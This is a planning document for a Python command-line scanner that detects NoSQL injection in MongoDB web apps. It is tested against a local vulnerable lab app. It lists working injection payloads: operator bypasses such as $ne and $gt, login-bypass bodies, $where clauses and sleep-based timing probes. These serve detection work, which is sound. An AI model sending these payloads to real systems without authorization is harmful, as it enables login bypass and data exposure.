NoSQL Injection CLI Scanner — Implementation Plan

Document Control

Field	Value
Project	NoSQL Injection CLI Scanner
Artifact	Implementation Plan v1.0
Runtime	Python 3.10+ (CPython), Windows / Linux / macOS
Stack	`argparse`, `requests`, `beautifulsoup4`, `rich`, `urllib3`
Target App	Custom Express/MongoDB app at `website/` (localhost:3000)
Version	1.0 Planning Baseline
Date	2026-04-22

1. Vision and Outcome

We are building a Python CLI vulnerability scanner that automatically detects NoSQL injection flaws in MongoDB-backed web applications. The tool crawls a target website, discovers forms and API inputs, injects categorized NoSQL payloads (operator injection, regex extraction, logic bypasses) via both URL-encoded and JSON content types, and analyzes server responses to flag authentication bypasses, data leaks, and abnormal behaviors. This matters because MongoDB/Node.js stacks are widely deployed yet under-tested for injection flaws — this tool gives security researchers and developers a repeatable, automated way to audit their applications without manual curl testing.

User Flow

Invoke — User runs python scanner.py --url http://localhost:3000 --max-depth 2 --output report.json --verbose from the cli/ directory.
Validate — Scanner validates the URL, confirms the target is reachable, and establishes a baseline response fingerprint.
Crawl — Scanner crawls internal pages within scope (up to --max-depth), collecting all discoverable HTML forms and their field structures.
Inject — For each discovered form, payloads from payloads.json are injected into each field. Each payload is tested as both application/x-www-form-urlencoded and application/json where applicable.
Analyze — Response analysis engine compares each response against the baseline, checking for status code changes, body content anomalies (e.g., "ok": true where "ok": false was expected), redirect behavior changes, and timing anomalies.
Report — Scanner writes a structured JSON report and prints a colorized console summary with severity-scored findings.

2. Scope

In Scope (V1)

CLI argument parsing with argparse (--url, --max-depth, --timeout, --output, --verbose, --content-type, --delay)
URL validation and normalization (scheme enforcement, trailing-slash normalization)
Recursive page crawler with scope restriction (same-origin only) and configurable depth limit
HTML form discovery via BeautifulSoup — extracting action, method, input name/type attributes
Curated payloads.json with categorized vectors:
- Operator injection: $ne, $gt, $regex, $in, $nin, $exists
- Logic bypass: ' || 1==1, $where clauses
- Time-based blind: sleep() payloads for timing side-channel detection
- Derived from nosqli_wordlist.txt and the NoSQL Injection reference guide
Dual content-type testing: each payload submitted as both application/x-www-form-urlencoded and application/json
Response analysis heuristics:
- Status code delta — 401 → 200 indicates bypass
- Body content matching — "ok": true, "Login successful", "count": changes
- Redirect detection — 3xx or client-side redirect indicators
- Timing analysis — response time > baseline + threshold indicates blind injection
- Error signature detection — MongoDB/Mongoose error strings in response body
Severity scoring: Critical / High / Medium / Low / Info
Structured JSON report matching the contract in README.md
Colorized console summary via rich
Session-aware scanning (cookie jar persistence across requests to handle authenticated flows)
Logging with Python logging module at configurable verbosity levels
Robust error handling: timeouts, connection errors, malformed HTML, unreachable targets

Out of Scope (V1)

Automated data exploitation/dumping — the scanner detects and proves, but does not extract database contents beyond proof-of-concept confirmation
Server-Side JavaScript Injection (SSJI) evaluation — $where payloads are included for detection, but arbitrary JS execution chains are not evaluated
GUI/Web interface — CLI only
Non-MongoDB databases — no CouchDB, Cassandra, or Redis-specific payloads
Proxy/interceptor integration — no Burp Suite or ZAP plugin mode
Distributed/multi-threaded scanning — single-threaded sequential scanning for V1
Custom authentication flows — scanner supports cookie-based sessions; OAuth/JWT/SAML are deferred

3. Quality Bar and Success Criteria

Functional Success

Scanner correctly identifies the known auth bypass on POST /api/vuln/login when injecting {"username": {"$gt": ""}, "password": {"$gt": ""}} — rated Critical/High
Scanner correctly identifies search injection on GET/POST /api/vuln/search when injecting operator objects — rated High/Medium
Scanner produces zero false positives when run against POST /api/secure/login and GET /api/secure/search (secure mode rejects all operator payloads with 400)
Scanner discovers at least the login form on /login.html and search form on /search.html via crawling
JSON report output validates against the report contract defined in README.md

Security Success

Scanner never stores or leaks target credentials beyond the scan session
All payloads are loaded from the external payloads.json file — no hardcoded attack strings in source
Scanner includes a mandatory --i-agree-to-legal-terms flag or disclaimer prompt before scanning non-localhost targets
No dependency with known CVEs at time of release

Performance Success

Full scan of the target app (2 pages, ~30 payloads × 2 content types × 2 forms) completes in under 60 seconds with default timeout (5s per request)
Individual request timeout default: 5 seconds
Memory usage under 100MB for any scan

Operability Success

pip install -r requirements.txt from a clean venv succeeds on Python 3.10+
python scanner.py --help prints complete usage documentation
Scanner exits with code 0 on success, 1 on scan errors, 2 on argument errors

UX/DX Success

Console output uses color-coded severity levels (red=Critical, orange=High, yellow=Medium, cyan=Low)
Progress indicators show current phase (Crawling → Injecting → Analyzing → Reporting)
Verbose mode logs every request/response pair for lab analysis and debugging

4. Target Architecture

4.1 Core Components

1. CLI Entry Point (scanner.py) The main entry point. Parses arguments via argparse, orchestrates the scan pipeline (validate → crawl → inject → analyze → report), and handles top-level error boundaries. Owns the decision of which phases to run and in what order.

2. URL Validator (core/validator.py) Validates and normalizes the target URL. Ensures scheme is http/https, resolves trailing slashes, and performs a reachability check (HEAD request) before the scan begins. Returns a canonical base URL for the crawler.

3. Web Crawler (core/crawler.py) Recursively discovers pages within the target's origin up to --max-depth. Maintains a visited-URL set to avoid cycles. For each discovered page, delegates to the form parser. Uses requests.Session for cookie persistence. Respects robots.txt as a courtesy (configurable).

4. Form Parser (core/form_parser.py) Uses BeautifulSoup to extract all <form> elements from a page. For each form, captures: action URL (resolved to absolute), HTTP method, input field names and types, and any hidden fields. Returns structured FormTarget objects for the injection engine.

5. Payload Manager (core/payloads.py) Loads and categorizes payloads from payloads.json. Exposes payloads grouped by category (operator_injection, logic_bypass, regex_extraction, time_based, blind_bruteforce). Each payload entry includes: the payload value, a category tag, expected behavior description, and applicable content types.

6. Injection Engine (core/injector.py) Takes a FormTarget and a list of payloads. For each injectable field, substitutes the payload and submits the form. Tests each payload under both application/x-www-form-urlencoded and application/json content types. Records the full request/response pair for analysis. Supports configurable inter-request delay.

7. Response Analyzer (core/analyzer.py) Compares each injection response against a baseline response (captured by submitting the form with benign data). Implements heuristic checks: status code delta, body content keyword matching, response length delta, redirect detection, timing anomaly detection (for time-based blind), and MongoDB error string scanning. Assigns a severity and confidence score to each finding.

8. Report Generator (core/reporter.py) Collects all findings from the analyzer and produces: (a) a structured JSON report file matching the contract in README.md, and (b) a colorized console summary table using rich. Includes scan metadata (target, start/end time, total forms/payloads tested, findings count by severity).

9. Utilities (core/utils.py) Shared helpers: logging configuration, URL resolution, timing utilities, constant definitions (e.g., known MongoDB error signatures), and the disclaimer/legal prompt.

4.2 Proposed Folder/Module Structure

cli/
├── scanner.py                  # Entry point — CLI argument parsing and pipeline orchestration
├── requirements.txt            # Python dependencies
├── payloads.json               # Categorized NoSQL injection payloads
├── core/
│   ├── __init__.py
│   ├── validator.py            # URL validation and reachability check
│   ├── crawler.py              # Recursive same-origin page crawler
│   ├── form_parser.py          # BeautifulSoup-based HTML form extractor
│   ├── payloads.py             # Payload loader and category manager
│   ├── injector.py             # Form submission engine (URL-encoded + JSON)
│   ├── analyzer.py             # Response comparison and heuristic scoring
│   ├── reporter.py             # JSON report writer + Rich console summary
│   ├── utils.py                # Shared helpers, constants, logging setup
│   └── models.py               # Data classes: FormTarget, Finding, ScanResult, Payload
├── references/
│   ├── NoSQL Injection.md      # Reference guide (existing)
│   └── nosqli_worlist.txt      # Raw wordlist (existing)
├── general plan.md             # Plan template (existing)
└── README.md                   # Usage documentation (existing)

5. Phase Plan

Phase 0 — Requirements and Risk Baseline

Goals: Confirm all requirements, validate the vulnerable target app is functional, and establish the development environment.

Work Packages:

Verify Python 3.10+ is installed and create the virtual environment (python -m venv .venv)
Populate requirements.txt with pinned versions: requests==2.32.*, beautifulsoup4==4.12.*, rich==13.*, urllib3==2.*
Start the target website (cd website && npm install && node src/server.js) and confirm it responds on http://localhost:3000
Manually verify the vulnerable endpoints still behave as documented in MODE_AUTH_FLOW_TEST_RESULTS.md:
- POST /api/vuln/login with username[$ne]=&password[$ne]= → 200 + "ok": true
- POST /api/vuln/login with legit creds → 200 + "ok": true
- POST /api/vuln/login with wrong creds → 401 + "ok": false
- POST /api/secure/login with password[$ne]= → 400 + "must be non-empty strings"
Create the cli/core/ package directory with __init__.py
Confirm payloads.json can be loaded and parsed (currently {}, will be populated in Phase 1)

Deliverables:

Working venv with all dependencies installed
Confirmed target app responses matching expected behavior
Empty cli/core/ package structure created

Exit Criteria:

pip install -r requirements.txt succeeds
Target app responds correctly to both legit and injection payloads
All team members have the same environment running

References: R1, R2, R3

Phase 1 — Foundation: Models, Payloads, and Utilities

Goals: Build the data layer and shared infrastructure that all other components depend on.

Work Packages:

Create core/models.py — Define the following dataclasses:

@dataclass
class FormTarget:
    url: str              # Absolute action URL
    method: str           # GET or POST
    fields: list[dict]    # [{"name": "username", "type": "text"}, ...]
    page_url: str         # Page where the form was found

@dataclass
class Payload:
    value: Any            # The payload (string, dict, or list)
    category: str         # operator_injection | regex_extraction | logic_bypass | time_based | blind_bruteforce
    description: str      # Human-readable explanation
    content_types: list   # ["urlencoded", "json"] or subset

@dataclass
class Finding:
    severity: str         # critical | high | medium | low | info
    confidence: str       # confirmed | tentative | speculative
    endpoint: str         # e.g., /api/vuln/login
    form_page: str        # e.g., /login.html
    method: str           # POST, GET
    content_type: str     # The content type that triggered the finding
    payload: Any          # The exact payload that triggered it
    payload_category: str # Category from Payload
    evidence: str         # Human-readable evidence description
    baseline_status: int  # Expected status code
    actual_status: int    # Observed status code
    response_snippet: str # First 500 chars of response body
    response_time_ms: float

@dataclass
class ScanResult:
    target: str
    scan_start: str       # ISO 8601
    scan_end: str         # ISO 8601
    pages_crawled: int
    forms_discovered: int
    payloads_tested: int
    findings: list[Finding]

Create core/utils.py — Implement:
- setup_logging(verbose: bool) -> logging.Logger — configures root logger with Rich handler
- resolve_url(base: str, relative: str) -> str — uses urllib.parse.urljoin
- MONGODB_ERROR_SIGNATURES: list[str] — ["MongoError", "MongoServerError", "CastError", "ValidationError", "BSONTypeError", "$where", "mapReduce"]
- SUCCESS_INDICATORS: list[str] — ['"ok": true', '"ok":true', '"Login successful"', '"message": "Login successful"']
- FAILURE_INDICATORS: list[str] — ['"ok": false', '"ok":false', '"Invalid credentials"']
- print_banner() — prints ASCII art tool name and version

Populate payloads.json — Curate payloads derived from nosqli_wordlist.txt and NoSQL Injection.md. Structure:

{
  "operator_injection": [
    {
      "value": {"$ne": ""},
      "description": "Not-equal empty string bypass",
      "content_types": ["urlencoded", "json"]
    },
    {
      "value": {"$gt": ""},
      "description": "Greater-than empty string bypass",
      "content_types": ["urlencoded", "json"]
    },
    {
      "value": {"$ne": null},
      "description": "Not-equal null bypass",
      "content_types": ["json"]
    },
    {
      "value": {"$regex": ".*"},
      "description": "Wildcard regex match-all",
      "content_types": ["json"]
    },
    {
      "value": {"$regex": "^a"},
      "description": "Regex prefix extraction probe (letter a)",
      "content_types": ["json"]
    },
    {
      "value": {"$exists": true},
      "description": "Field existence check bypass",
      "content_types": ["json"]
    },
    {
      "value": {"$in": ["admin", "root", "administrator", "Admin"]},
      "description": "In-list common username brute force",
      "content_types": ["json"]
    },
    {
      "value": {"$nin": ["impossible_value_12345"]},
      "description": "Not-in exclusion bypass",
      "content_types": ["json"]
    }
  ],
  "logic_bypass": [
    {
      "value": "' || 1==1",
      "description": "JS logical OR tautology",
      "content_types": ["urlencoded"]
    },
    {
      "value": "' || 1==1//",
      "description": "JS logical OR tautology with comment",
      "content_types": ["urlencoded"]
    },
    {
      "value": "' || 1==1%00",
      "description": "JS logical OR with null byte terminator",
      "content_types": ["urlencoded"]
    },
    {
      "value": "true, $where: '1 == 1'",
      "description": "$where clause injection via string concatenation",
      "content_types": ["urlencoded"]
    },
    {
      "value": ", $where: '1 == 1'",
      "description": "$where clause injection (comma prefix)",
      "content_types": ["urlencoded"]
    }
  ],
  "regex_extraction": [
    {
      "value": {"$regex": "^admin"},
      "description": "Regex probe — starts with admin",
      "content_types": ["json"]
    },
    {
      "value": {"$regex": "^.{1,50}$"},
      "description": "Regex probe — match strings 1-50 chars",
      "content_types": ["json"]
    }
  ],
  "time_based": [
    {
      "value": {"$where": "sleep(3000)"},
      "description": "Time-based blind — 3 second sleep",
      "content_types": ["json"],
      "expected_delay_ms": 3000
    },
    {
      "value": "';sleep(3000);",
      "description": "JS injection sleep via string break",
      "content_types": ["urlencoded"],
      "expected_delay_ms": 3000
    }
  ],
  "auth_bypass_combo": [
    {
      "value": {"username": {"$gt": ""}, "password": {"$gt": ""}},
      "description": "Full auth bypass — both fields gt empty",
      "content_types": ["json"],
      "is_full_body": true
    },
    {
      "value": {"username": {"$ne": null}, "password": {"$ne": null}},
      "description": "Full auth bypass — both fields ne null",
      "content_types": ["json"],
      "is_full_body": true
    },
    {
      "value": {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}},
      "description": "Full auth bypass — both fields ne arbitrary",
      "content_types": ["json"],
      "is_full_body": true
    },
    {
      "value": {"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$gt": ""}},
      "description": "Admin brute force via $in + $gt bypass",
      "content_types": ["json"],
      "is_full_body": true
    }
  ]
}

Create core/payloads.py — Implement:
- load_payloads(filepath: str) -> dict[str, list[Payload]] — loads and validates payloads.json, returns categorized Payload objects
- get_all_payloads(categories: dict) -> list[Payload] — flattens all categories into a single list
- get_payloads_for_content_type(payloads: list[Payload], content_type: str) -> list[Payload] — filters payloads by content type

Deliverables:

core/models.py with all dataclasses
core/utils.py with logging, URL helpers, and constants
core/payloads.py with loader and filter functions
Populated payloads.json with 20+ categorized payloads

Exit Criteria:

from core.models import FormTarget, Payload, Finding, ScanResult works
load_payloads("payloads.json") returns populated payload categories
All constants are centrally defined and importable

References: R1, R2, R3

Phase 2 — URL Validation and Web Crawler

Goals: Implement the input validation layer and recursive page crawler that discovers all forms within the target scope.

Work Packages:

Create core/validator.py — Implement:
- validate_url(url: str) -> str — checks scheme is http/https, normalizes trailing slash, validates hostname format. Raises ValueError on invalid input.
- check_reachability(url: str, timeout: int) -> tuple[bool, int, float] — sends HEAD request, returns (reachable, status_code, response_time_ms). Handles ConnectionError, Timeout, TooManyRedirects.
- get_base_origin(url: str) -> str — extracts scheme://host:port for scope comparison.
Create core/crawler.py — Implement:
- Crawler class with:
  - __init__(self, base_url: str, max_depth: int, timeout: int, session: requests.Session)
  - crawl(self) -> list[CrawledPage] — BFS/DFS traversal starting from base_url
  - _fetch_page(self, url: str) -> str | None — GET request, return HTML body or None on error
  - _extract_links(self, html: str, page_url: str) -> list[str] — find all <a href> links, resolve to absolute, filter to same origin
  - _is_in_scope(self, url: str) -> bool — checks if URL shares the same origin as base
- CrawledPage dataclass: url: str, html: str, depth: int
- Visited-URL deduplication via set
- Skip non-HTML resources (check Content-Type header before parsing)
- Log each discovered page at INFO level

Deliverables:

core/validator.py — URL validation and reachability
core/crawler.py — recursive crawler with scope enforcement

Exit Criteria:

validate_url("http://localhost:3000") returns normalized URL
validate_url("not-a-url") raises ValueError
Crawler("http://localhost:3000", max_depth=2, ...).crawl() discovers at least /, /login.html, /search.html
Crawler does not visit external links or non-HTML resources

References: R1, R4

Phase 3 — Form Discovery and Parsing

Goals: Extract all injectable form targets from crawled pages.

Work Packages:

Create core/form_parser.py — Implement:
- parse_forms(html: str, page_url: str) -> list[FormTarget] — uses BeautifulSoup to find all <form> tags
- For each form, extract:
  - action attribute → resolve to absolute URL using page_url as base
  - method attribute → default to GET if missing, normalize to uppercase
  - All <input>, <textarea>, <select> elements → capture name, type, value (default value if present)
  - Hidden fields are preserved (they may contain CSRF tokens or mode selectors)
- Return list of FormTarget objects
- Handle edge cases: forms with no action (submit to current page), forms with empty method, nested forms (invalid HTML but handle gracefully)
Integration test: Run crawler → form parser pipeline against http://localhost:3000 and verify:
- Login form discovered with fields: username (text), password (password), send-json (checkbox)
- Search form discovered with fields: query (text), send-json (checkbox)
- Action URLs resolve correctly (/api/vuln/login, /api/vuln/search or relative)

Important

The login and search forms in the target app submit via JavaScript (login.js, search.js), not via standard HTML form actions. The <form> tags may have no action attribute, or the action may not match the actual API endpoint. The form parser should extract what it finds from the HTML, but the injection engine (Phase 4) must allow manual endpoint override via CLI flag (--endpoints) or fall back to discovered API path inference by examining the JS files for fetch/XHR URLs.

Deliverables:

core/form_parser.py — BeautifulSoup-based form extractor
Verified form discovery against the live target

Exit Criteria:

parse_forms(html, "http://localhost:3000/login.html") returns at least one FormTarget with username and password fields
All form field names are correctly captured
Absolute action URLs are correctly resolved

References: R1, R4

Phase 4 — Injection Engine

Goals: Build the core scanning engine that submits payloads to discovered forms and records responses.

Work Packages:

Create core/injector.py — Implement:
- Injector class with:
  - __init__(self, session: requests.Session, timeout: int, delay: float, verbose: bool)
  - establish_baseline(self, form: FormTarget) -> BaselineResponse — submit the form with benign data (empty strings or placeholder values) to capture the "normal" response (status code, body length, key content markers, response time)
  - inject_form(self, form: FormTarget, payloads: list[Payload]) -> list[InjectionResult] — for each payload:
    1. For each injectable field (skip checkboxes, hidden fields with fixed values)
    2. For each applicable content type (urlencoded, json):
      - Build the request body with the payload substituted into the current field, benign values in other fields
      - For is_full_body payloads (auth_bypass_combo), use the payload as the entire request body
      - Submit and record: status code, response body, response headers, response time, any cookies set
      - Apply inter-request delay if configured
  - _build_urlencoded_body(self, form: FormTarget, field_name: str, payload_value) -> dict — for operator payloads like {"$ne": ""}, encode as field_name[$ne]=
  - _build_json_body(self, form: FormTarget, field_name: str, payload_value) -> dict — substitute payload object directly into JSON body
- BaselineResponse dataclass: status_code, body_length, body_hash, response_time_ms, key_markers (list of found SUCCESS/FAILURE indicators)
- InjectionResult dataclass: form, field_name, payload, content_type, status_code, body, headers, response_time_ms, cookies
URL-encoded operator encoding logic: When sending operator injection payloads via urlencoded content type, the injector must format them correctly for Express's qs parser:
- {"$ne": ""} → field_name[$ne]=
- {"$gt": ""} → field_name[$gt]=
- {"$regex": ".*"} → field_name[$regex]=.*
- {"$in": ["admin", "root"]} → field_name[$in][]=admin&field_name[$in][]=root
Session cookie management: The injector must use a shared requests.Session so that if a payload achieves login (sets a session cookie), subsequent requests to authenticated endpoints (like /api/vuln/search) can be tested in the authenticated context. The injector should also support resetting the session between payload groups to avoid cross-contamination (logout + new session).

Deliverables:

core/injector.py — injection engine with dual content-type support
Baseline capture and session management

Exit Criteria:

Injector correctly sends POST /api/vuln/login with {"username": {"$gt": ""}, "password": {"$gt": ""}} as JSON and receives 200
Injector correctly sends POST /api/vuln/login with username[$ne]=&password[$ne]= as urlencoded and receives 200
Injector correctly sends the same payloads to /api/secure/login and receives 400
Baseline response for login form correctly captures 401 status with "ok": false
Inter-request delay is respected

References: R1, R2, R3, R5

Phase 5 — Response Analysis and Severity Scoring

Goals: Implement the intelligence layer that determines whether an injection response indicates a vulnerability.

Work Packages:

Create core/analyzer.py — Implement:
- ResponseAnalyzer class with:
  - __init__(self, baseline: BaselineResponse, time_threshold_ms: float = 2500)
  - analyze(self, result: InjectionResult) -> Finding | None — runs all heuristic checks and returns a Finding if any trigger, or None if benign
  - _check_status_code_delta(self, result) -> tuple[bool, str] — returns True if status changed from failure (4xx) to success (2xx/3xx). Evidence: "Status changed from {baseline} to {actual}"
  - _check_auth_bypass(self, result) -> tuple[bool, str] — searches response body for SUCCESS_INDICATORS when baseline contained FAILURE_INDICATORS. Evidence: "Auth bypass detected: response contains 'Login successful'"
  - _check_data_leak(self, result) -> tuple[bool, str] — checks if response body contains significantly more data than baseline (body length ratio > 1.5x, or new JSON keys like "results", "count" appear). Evidence: "Data leak: response body {X}x larger than baseline"
  - _check_error_signature(self, result) -> tuple[bool, str] — scans response body for MONGODB_ERROR_SIGNATURES. Evidence: "MongoDB error exposed: {matched_signature}"
  - _check_timing_anomaly(self, result) -> tuple[bool, str] — if payload is time_based category and response_time > baseline + expected_delay * 0.8, flag. Evidence: "Time-based blind: response took {X}ms (baseline: {Y}ms)"
  - _check_redirect_change(self, result) -> tuple[bool, str] — if baseline had no redirect but injection response has 3xx or Location header. Evidence: "Unexpected redirect to {location}"

Severity scoring logic:

Condition	Severity	Confidence
Auth bypass confirmed (status 401→200 + success indicator in body)	critical	confirmed
Auth bypass partial (status change but no success indicator)	high	tentative
Data leak detected (significant body length increase)	high	confirmed
MongoDB error exposed	medium	confirmed
Time-based blind (timing confirms)	high	tentative
Redirect change observed	medium	speculative
Status code change only (no other indicators)	low	speculative

Finding deduplication: If the same endpoint+field combination triggers on multiple similar payloads (e.g., $ne and $gt both bypass login), keep the finding with the highest severity/confidence and note the others as corroborating evidence.

Deliverables:

core/analyzer.py — multi-heuristic response analyzer with severity scoring
Finding deduplication logic

Exit Criteria:

Analyzer correctly flags the $ne/$gt auth bypass on /api/vuln/login as critical / confirmed
Analyzer correctly produces no findings for the same payloads against /api/secure/login
Time-based analysis correctly flags delayed responses (tested with time_based payloads)
MongoDB error exposure correctly detected when errors leak in response body

References: R1, R2, R5

Phase 6 — Report Generation and Console Output

Goals: Produce the final JSON report and a professional console summary.

Work Packages:

Create core/reporter.py — Implement:

generate_json_report(scan_result: ScanResult, output_path: str) — writes JSON matching the contract:

{
  "target": "http://localhost:3000",
  "scan_time": "2026-04-22T10:15:00Z",
  "scan_duration_seconds": 42,
  "summary": {
    "pages_crawled": 3,
    "forms_tested": 2,
    "payloads_tested": 48,
    "potential_findings": 4,
    "by_severity": {
      "critical": 1,
      "high": 2,
      "medium": 1,
      "low": 0,
      "info": 0
    }
  },
  "findings": [ ... ]
}

print_console_summary(scan_result: ScanResult) — uses rich to display:
- Header banner with scan metadata
- Summary statistics table
- Findings table with columns: Severity, Endpoint, Payload Category, Evidence, Confidence
- Color-coded severity (Critical=red bold, High=red, Medium=yellow, Low=cyan, Info=dim)
- Footer with report file path

Verbose output mode: When --verbose is active, print each request/response pair as it happens (method, URL, content-type, payload, status code, response time, first 200 chars of body).

Deliverables:

core/reporter.py — JSON file writer + Rich console table
Verbose request/response logging

Exit Criteria:

JSON report validates against the contract schema
Console output is readable, color-coded, and includes all findings
Verbose mode logs every request/response pair with timing

References: R1, R6

Phase 7 — CLI Entry Point and Pipeline Integration

Goals: Wire everything together in scanner.py and implement the full scan pipeline.

Work Packages:

Implement scanner.py — Full argument parser and orchestration:
```
usage: scanner.py [-h] --url URL [--max-depth N] [--timeout SECS]
                  [--delay SECS] [--output FILE] [--verbose]
                  [--content-type {both,urlencoded,json}]
                  [--endpoints ENDPOINT [ENDPOINT ...]]
                  [--categories CATEGORY [CATEGORY ...]]
```
Arguments:
- --url (required): Target base URL
- --max-depth (default: 2): Crawl depth limit
- --timeout (default: 5): Per-request timeout in seconds
- --delay (default: 0.1): Delay between injection requests in seconds
- --output (default: report.json): Output report file path
- --verbose / -v: Enable verbose request/response logging
- --content-type (default: both): Which content types to test (both, urlencoded, json)
- --endpoints: Manual endpoint override — skip crawling and inject directly into these endpoints (e.g., POST:/api/vuln/login:username,password)
- --categories: Filter payload categories (e.g., operator_injection time_based)

Scan pipeline in main():

def main():
    args = parse_args()
    logger = setup_logging(args.verbose)
    print_banner()

    # Phase 1: Validate
    base_url = validate_url(args.url)
    reachable, status, rtt = check_reachability(base_url, args.timeout)
    if not reachable:
        logger.error(f"Target unreachable: {base_url}")
        sys.exit(1)

    # Phase 2: Load payloads
    payloads = load_payloads("payloads.json")
    if args.categories:
        payloads = {k: v for k, v in payloads.items() if k in args.categories}

    # Phase 3: Discover forms
    session = requests.Session()
    if args.endpoints:
        forms = parse_manual_endpoints(args.endpoints)
    else:
        crawler = Crawler(base_url, args.max_depth, args.timeout, session)
        pages = crawler.crawl()
        forms = []
        for page in pages:
            forms.extend(parse_forms(page.html, page.url))

    # Phase 4: Inject and analyze
    injector = Injector(session, args.timeout, args.delay, args.verbose)
    analyzer_findings = []
    all_payloads = get_all_payloads(payloads)

    for form in forms:
        baseline = injector.establish_baseline(form)
        results = injector.inject_form(form, all_payloads)
        response_analyzer = ResponseAnalyzer(baseline)
        for result in results:
            finding = response_analyzer.analyze(result)
            if finding:
                analyzer_findings.append(finding)

    # Phase 5: Report
    scan_result = ScanResult(
        target=base_url,
        scan_start=start_time,
        scan_end=datetime.utcnow().isoformat(),
        pages_crawled=len(pages),
        forms_discovered=len(forms),
        payloads_tested=total_injections,
        findings=deduplicate_findings(analyzer_findings)
    )
    generate_json_report(scan_result, args.output)
    print_console_summary(scan_result)

Error handling wrapper: Wrap the entire pipeline in try/except. Handle KeyboardInterrupt (print partial results), ConnectionError (retry once then fail), and unexpected errors (log traceback, exit 1).
Exit codes: 0 = success (scan completed, findings or not), 1 = scan error (unreachable target, etc.), 2 = argument error.

Deliverables:

Complete scanner.py with argument parsing and pipeline orchestration
Manual endpoint mode (--endpoints)
Error handling and exit codes

Exit Criteria:

python scanner.py --help prints full usage
python scanner.py --url http://localhost:3000 --output report.json completes a full scan and produces a valid report
python scanner.py --url http://localhost:3000 --endpoints "POST:/api/vuln/login:username,password" --verbose scans only the login endpoint
Scanner exits with code 2 on bad arguments, code 1 on connection failure

References: R1, R4

Phase 8 — Testing and Validation

Goals: Validate the scanner produces correct results against both vulnerable and secure flows.

Work Packages:

Validate against vulnerable flow:
- Run full scan against http://localhost:3000 (vulnerable mode endpoints)
- Confirm the report contains:
  - At least one critical finding for auth bypass on /api/vuln/login
  - At least one high finding for search injection on /api/vuln/search
- Verify payloads that triggered include: $ne, $gt, $regex operator injections
- Verify evidence descriptions are clear and actionable
Validate against secure flow:
- Run scan with --endpoints "POST:/api/secure/login:username,password" "POST:/api/secure/search:query"
- Confirm the report contains zero findings (secure endpoints reject all operator payloads with 400)
- Verify no false positives from timing noise or status code coincidences
Edge case testing:
- Test against unreachable URL → clean error message, exit code 1
- Test with --timeout 0.001 → timeout handling works gracefully
- Test with empty payloads.json → scanner reports no payloads to test
- Test with --max-depth 0 → scanner tests only the root page
- Test with malformed HTML target → parser handles gracefully
Performance validation:
- Full scan completes in under 60 seconds
- Memory usage stays under 100MB

Deliverables:

Validated scan reports for both vulnerable and secure flows
Edge case test results documented
Performance benchmarks recorded

Exit Criteria:

Zero false negatives against the vulnerable flow (all known vulnerabilities detected)
Zero false positives against the secure flow
All edge cases handled gracefully without crashes

References: R1, R2, R5

Phase 9 — Packaging, Documentation, and Release Readiness

Goals: Polish the tool for release, finalize documentation, and ensure reproducible builds.

Work Packages:

Finalize requirements.txt with exact pinned versions from the working venv (pip freeze)
Update README.md with:
- Installation instructions (venv setup, pip install)
- Complete usage examples (basic scan, verbose mode, manual endpoints, category filtering)
- Report output description with annotated example
- Troubleshooting section (common errors and solutions)
Add inline docstrings to all public functions and classes
Add --version flag to the CLI
Verify clean install: delete venv, recreate, install deps, run scan — everything works from scratch
Create example reports: Include a sample example_report.json in the repo showing expected output

Deliverables:

Pinned requirements.txt
Updated README.md with full documentation
All modules documented with docstrings
Example report file
Clean install verified

Exit Criteria:

pip install -r requirements.txt && python scanner.py --help works from a fresh venv
README covers all CLI options and includes worked examples
Example report demonstrates the output format

References: R1, R6

6. Security Plan (Cross-Cutting)

6.1 Threat Model Checklist

Accidental scanning of production systems — user mistypes URL or forgets scope restrictions; could trigger WAF alerts or legal issues
Credential leakage in reports — session cookies or leaked credentials from successful bypasses appear in JSON reports
Payload self-injection — if scanner processes its own output or error messages contain payloads, could cause confusion
Dependency supply chain — compromised PyPI packages in the dependency chain
Excessive resource consumption — unbounded crawling or aggressive request rates could DoS the target

6.2 Mandatory Controls

Legal disclaimer: Scanner prints a warning on startup: "This tool should only be used on systems you own or have explicit authorization to test."
Localhost default scope: When targeting non-localhost origins, require explicit --confirm-external flag
Report sanitization: Truncate response bodies in reports to 500 characters; strip Set-Cookie headers from stored responses
Dependency pinning: All dependencies pinned to specific versions in requirements.txt
Request rate limiting: Default 100ms delay between requests (--delay flag), with minimum floor of 50ms

6.3 Security Testing Controls

Run pip audit or safety check against installed dependencies before release
Manual review of all payloads in payloads.json to ensure they are detection-only (no destructive operations like db.dropDatabase())
Verify scanner does not follow redirects to external domains during crawling

7. Performance Plan (Cross-Cutting)

7.1 Key Levers

Request timeout — controls how long each injection attempt waits; directly impacts total scan time
Inter-request delay — prevents overwhelming the target; trades scan speed for target stability
Crawl depth — limits the number of pages discovered; deeper crawls find more forms but take longer
Payload count — more payloads = more thorough coverage but longer scans
Content-type testing — testing both urlencoded and JSON doubles the request count

7.2 Recommended Defaults

Setting	Default	Rationale
`--timeout`	5s	Sufficient for localhost; prevents hanging on unresponsive endpoints
`--delay`	0.1s	100ms is respectful to target while keeping scan time reasonable
`--max-depth`	2	Captures most forms without deep-crawling large sites
`--content-type`	`both`	Maximizes detection coverage; necessary since Express handles both formats
Time-based threshold	2500ms	Sleep payloads use 3000ms; 2500ms threshold accounts for network jitter

7.3 Runtime Safeguards

Per-request timeout: Hard timeout of --timeout seconds on every HTTP request; requests.Timeout caught and logged
Max pages cap: Crawler stops after 50 pages regardless of depth (prevents infinite crawling on large sites)
Max payloads per form: Warn if more than 100 payloads are being tested per form (likely misconfiguration)
Response body cap: Read at most 1MB of response body per request (prevents memory issues on large responses)
Graceful degradation: If a form fails baseline capture (e.g., requires auth), skip it with a warning instead of aborting the entire scan

8. Configuration Surface

8.1 Non-Secret Settings

Key	Type	Default	Description
`--url`	string	(required)	Target base URL
`--max-depth`	int	2	Maximum crawl depth
`--timeout`	float	5.0	Per-request timeout (seconds)
`--delay`	float	0.1	Inter-request delay (seconds)
`--output`	string	`report.json`	Output report file path
`--verbose`	bool	false	Enable detailed request/response logging
`--content-type`	enum	`both`	Content types to test: `both`, `urlencoded`, `json`
`--endpoints`	list[str]	[]	Manual endpoint specifications (skip crawling)
`--categories`	list[str]	all	Payload categories to use

8.2 Secret / Credential Storage

No secrets are required by the scanner itself. If the target requires authentication before scanning protected endpoints, the user should:

Use --endpoints mode with manually specified endpoints
Or pre-authenticate via browser and export cookies to a file (future V2 feature)

No credential storage mechanism is needed for V1.

9. CI/CD and Governance Plan

Pull Requests / Merges

All code changes via pull request to main
PR checks:
